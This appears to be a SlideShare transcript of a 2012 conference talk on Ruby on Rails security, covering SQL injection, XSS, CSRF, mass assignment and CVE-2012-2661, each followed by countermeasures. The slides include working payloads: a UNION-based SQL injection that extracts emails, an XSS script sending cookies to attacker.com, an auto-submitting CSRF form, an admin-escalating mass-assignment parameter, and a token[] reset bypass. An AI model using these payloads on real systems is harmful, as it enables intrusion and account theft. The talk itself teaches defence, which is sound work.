Web Application Security in Rails
0 likes1,360 views
This document summarizes common web application security vulnerabilities in Ruby on Rails such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), mass assignment, and CVE-2012-2661. It provides examples of these vulnerabilities and discusses countermeasures like input sanitization, access control, CSRF tokens, whitelisting attributes, and upgrading Rails versions. The document concludes by recommending following Rails security best practices and resources for learning about securing Rails applications.
![SQL Injection
@results = Micropost.where(
"content LIKE '%#{params[:query]%’”).all
SELECT 'microposts'.*
FROM 'microposts’
WHERE (content LIKE ’%SEARCHSTRING%’)](https://image.slidesharecdn.com/rails-webapplicationsecurityv5-130218093152-phpapp01/85/Web-Application-Security-in-Rails-12-320.jpg)
![SQL Injection - countermeasures
@results = Micropost.where(
"content LIKE ?’, "%#{params[:query]}%”)
).all](https://image.slidesharecdn.com/rails-webapplicationsecurityv5-130218093152-phpapp01/85/Web-Application-Security-in-Rails-16-320.jpg)
![XSS - countermeasures
<span class="content">
<%= sanitize feed_item.content,
:tags => ['a’]
%>
</span>](https://image.slidesharecdn.com/rails-webapplicationsecurityv5-130218093152-phpapp01/85/Web-Application-Security-in-Rails-20-320.jpg)
![MASS boo[gotcha!]
ASSIGNMENT](https://image.slidesharecdn.com/rails-webapplicationsecurityv5-130218093152-phpapp01/85/Web-Application-Security-in-Rails-32-320.jpg)
![Mass Assignment
def create
@user = User.new(params[:user])
...
end](https://image.slidesharecdn.com/rails-webapplicationsecurityv5-130218093152-phpapp01/85/Web-Application-Security-in-Rails-33-320.jpg)
![Mass Assignment
def create
@user = User.new(params[:user])
...
end
{ :name => “gotcha”,
:admin => true }](https://image.slidesharecdn.com/rails-webapplicationsecurityv5-130218093152-phpapp01/85/Web-Application-Security-in-Rails-34-320.jpg)
![CVE-2012-2661 SQL Injection
User.where(
:id => params[:user_id],
:reset_token => params[:token]
)
SELECT users.*
FROM users
WHERE users.id = 6
AND users.reset_token = ’XYZ'
LIMIT 1](https://image.slidesharecdn.com/rails-webapplicationsecurityv5-130218093152-phpapp01/85/Web-Application-Security-in-Rails-40-320.jpg)
![CVE-2012-2661 SQL Injection
/users/6/password/edit?token[]
SELECT users.*
FROM users
WHERE users.id = 6
AND users.reset_token IS NULL
LIMIT 1](https://image.slidesharecdn.com/rails-webapplicationsecurityv5-130218093152-phpapp01/85/Web-Application-Security-in-Rails-41-320.jpg)
Web Application Security in Rails
- 1. WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012
- 2. Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael
- 3. Buy Now, Pay Later 1. Shop online 2. Receive your goods 3. Pay
- 4. Alice
- 5. Bob
- 8. Alice and Bob Like Duh?
- 9. Alice and Bob <html> <title> #$@# MicroBlogging %#@&*#$ </title> ...
- 10. Alice and Bob Hack it!
- 11. SQL INJECTION
- 12. SQL Injection @results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’ WHERE (content LIKE ’%SEARCHSTRING%’)
- 13. SQL Injection SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
- 14. SQL Injection SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
- 15. SQL Injection SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
- 16. SQL Injection - countermeasures @results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all
- 17. CROSS SITE XSS SCRIPTING
- 18. XSS <span class="content"> <%= raw feed_item.content %> </span>
- 19. XSS <script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>
- 20. XSS - countermeasures <span class="content"> <%= sanitize feed_item.content, :tags => ['a’] %> </span>
- 21. XSS The Attack: Execute arbitrary code / defacement JSON is not escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem)
- 22. CROSS CSRF SITE REQUEST FORGERY
- 24. CSRF www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> 2 Click here for free iPad
- 25. CSRF www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() 3 </script>
- 26. CSRF www.blog.com www.freeiPad.com POST /blogpost <form name=“evilform” Content=“Kick Me!” action=“www.blog.com/….”> … <script> document.evilform.submit() 4 </script>
- 27. CSRF – Authenticity Token <input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“ />
- 28. CSRF routes.rb match '/delete_post/:id', to: 'microposts#destroy'
- 29. CSRF class ApplicationController < ActionController::Base # commented to easily test forms # protect_from_forgery ... end
- 30. CSRF The Attack: Attacker send requests on the victim’s behalf Doesn’t depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link
- 32. MASS boo[gotcha!] ASSIGNMENT
- 33. Mass Assignment def create @user = User.new(params[:user]) ... end
- 34. Mass Assignment def create @user = User.new(params[:user]) ... end { :name => “gotcha”, :admin => true }
- 35. Mass Assignment - countermeasures Blacklist class User < ActiveRecord::Base attr_protected :admin ... end
- 36. Mass Assignment - countermeasures Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation ...
- 37. Mass Assignment - countermeasures Global Config (whitelist) config.active_record. whitelist_attributes = true
- 38. Mass Assignment The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem
- 39. SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
- 40. CVE-2012-2661 SQL Injection User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1
- 41. CVE-2012-2661 SQL Injection /users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1
- 42. CVE-2012-2661 SQL Injection The Attack: SQL Injection - Affected version: Rails < 3.2.4 Countermeasures: Upgrade to Rails 3.2.4 or higher
- 43. Brakeman ------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross Site Scripting |2 | | Cross-Site Request Forgery | 1 | | Denial of Service |1 | | Redirect |1 | | SQL Injection |4 | -------------------------------------------------
- 44. CONCLUSIONS
- 45. Make Love not War
- 46. Conclusions Know the threats – OWASP top 10 Follow Rails conventions Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security
- 47. Thanks to… Daniel Amselem for pair programming Irit Shainzinger for the cool graphics Michael Hartl for his microblogging app tutorial
- 48. Pay Online – Safer and Simpler https://github.com/unativ/sample_app